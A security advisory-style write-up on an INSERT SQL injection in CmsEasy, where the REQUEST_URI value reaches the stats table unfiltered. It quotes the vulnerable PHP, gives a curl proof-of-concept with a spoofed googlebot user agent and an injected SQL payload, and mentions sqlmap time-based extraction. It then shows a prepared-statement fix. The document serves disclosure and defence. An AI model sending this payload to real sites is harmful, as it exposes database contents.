CmsEasy Latest Version foreground SQL injection (2)

Source: Internet
Author: User

Over the past few days I have been trying out a PHP source-code audit tool. Its preliminary rule matching is not very targeted, but it still turned up something in CmsEasy: an INSERT injection. /index.php calls stats::getbot(); what does that method do? From /lib/table/stats.php:

    public static function getbot() {
        $ServerName = $_SERVER["SERVER_NAME"];
        $ServerPort = $_SERVER["SERVER_PORT"];
        $ScriptName = $_SERVER["SCRIPT_NAME"];
        $QueryString = $_SERVER["QUERY_STRING"];
        $serverip = $_SERVER["REMOTE_ADDR"];
        $GetLocationURL = self::geturl();
        $agent1 = $_SERVER["HTTP_USER_AGENT"];
        $agent = strtolower($agent1);
        $Bot = "";
        if (strpos($agent, "googlebot") > -1) { $Bot = "Google"; }
        if (strpos($agent, "mediapartners-google") > -1) { $Bot = "Google Adsense"; }
        if (strpos($agent, "baiduspider") > -1) { $Bot = "Baidu"; }
        if (strpos($agent, "sogou") > -1) { $Bot = "Sogou"; }
        if (strpos($agent, "yahoo") > -1) { $Bot = "Yahoo!"; }
        if (strpos($agent, "msn") > -1) { $Bot = "MSN"; }
        if (strpos($agent, "soso") > -1) { $Bot = "Soso"; }
        if (strpos($agent, "ia_archiver") > -1) { $Bot = "Alexa"; }
        if (strpos($agent, "sohu") > -1) { $Bot = "Sohu"; }
        if (strpos($agent, "sqworm") > -1) { $Bot = "AOL"; }
        if (strpos($agent, "yodaobot") > -1) { $Bot = "Yodao"; }
        if (strpos($agent, "iaskspider") > -1) { $Bot = "Iask"; }
        if (strlen($Bot) > 0 && !front::get('admin_dir')) {
            $stats = self::getInstance();
            // $GetLocationURL is whatever self::geturl() returned above
            $insert = $stats->rec_insert(array(
                'bot'  => $Bot,
                'url'  => $GetLocationURL,
                'ip'   => $serverip,
                'time' => date('Y-m-d H:i:s')
            ));
        }
    }


Now look at the geturl() method:

    public static function geturl() {
        if (!empty($_SERVER["REQUEST_URI"])) {
            // Obviously the value is taken straight from REQUEST_URI, which bypasses the
            // input filtering; for the filtering method see /lib/tool/front_class.php around line 328
            $scrtName = $_SERVER["REQUEST_URI"];
            $nowurl = $scrtName;
        } else {
            $scrtName = $_SERVER["PHP_SELF"];
            if (empty($_SERVER["QUERY_STRING"])) {
                $nowurl = $scrtName;
            } else {
                $nowurl = $scrtName . "?" . $_SERVER["QUERY_STRING"];
            }
        }
        return ((isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https://' : 'http://')
            . $_SERVER['HTTP_HOST'] . $nowurl;
    }


PHP does not urldecode REQUEST_URI, and current browsers percent-encode the quote characters on their own, so curl on the command line is the most convenient way to reproduce it, for example:

    curl -A "this is googlebot" "http://localhost/test/CmsEasy/index.php?a=','','2014-1-1-1'),(database(),'2"

CmsEasy suppresses database errors by default, which is good for them, so pulling data out of this point requires sqlmap's time-based (delay) technique. Of course, the walkthrough above was reconstructed after the injection point had been found; the tool had simply flagged REQUEST_URI and HTTP_USER_AGENT being used directly.

Solution: it is recommended to apply the same filtering inside the DB handling class, or to strictly check any input that does not come from the GPC (GET/POST/COOKIE) range.
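One way to apply that recommendation in the DB layer, as an added example that is not CmsEasy's own code: the stats row from getbot() is written through a PDO prepared statement, so REQUEST_URI is bound as data instead of being spliced into the INSERT. The stats table layout (bot, url, ip, time) and the in-memory SQLite database are assumptions made so the script runs stand-alone.

```php
<?php
// Added example, not CmsEasy's own code: the getbot() stats row written through a
// prepared statement. Assumed table layout (bot, url, ip, time) in an in-memory
// SQLite database so the script runs stand-alone.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE stats (bot TEXT, url TEXT, ip TEXT, time TEXT)');

function recordBotVisit(PDO $pdo, string $bot, string $url, string $ip): int
{
    // REQUEST_URI is attacker-controlled and PHP never urldecodes it, so it is bound
    // as a parameter: the driver sends it as data and it cannot close the VALUES
    // tuple. Capping the length also stops the column being used as bulk storage.
    $url = substr($url, 0, 2048);
    $stmt = $pdo->prepare('INSERT INTO stats (bot, url, ip, time) VALUES (?, ?, ?, ?)');
    $stmt->execute([$bot, $url, $ip, date('Y-m-d H:i:s')]);
    return $stmt->rowCount(); // affected row count
}

// Constructed request: the quote-laden URI from the curl reproduction above.
$uri = "/index.php?a=','','2014-1-1-1'),(database(),'2";
recordBotVisit($pdo, 'Google', 'http://localhost' . $uri, '127.0.0.1');

// Verify: exactly one row, and the url column holds the literal text, quotes included.
$rows = $pdo->query('SELECT bot, url FROM stats')->fetchAll(PDO::FETCH_ASSOC);
if (count($rows) !== 1 || $rows[0]['url'] !== 'http://localhost' . $uri) {
    fwrite(STDERR, "unexpected stats contents\n");
    exit(1);
}
echo "stored " . count($rows) . " row; url=" . $rows[0]['url'] . "\n";
```

With string concatenation the same URI would have produced two rows, the second carrying database() output; with binding the whole string lands in one url column, which is also the easy thing to alert on in the stats table.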
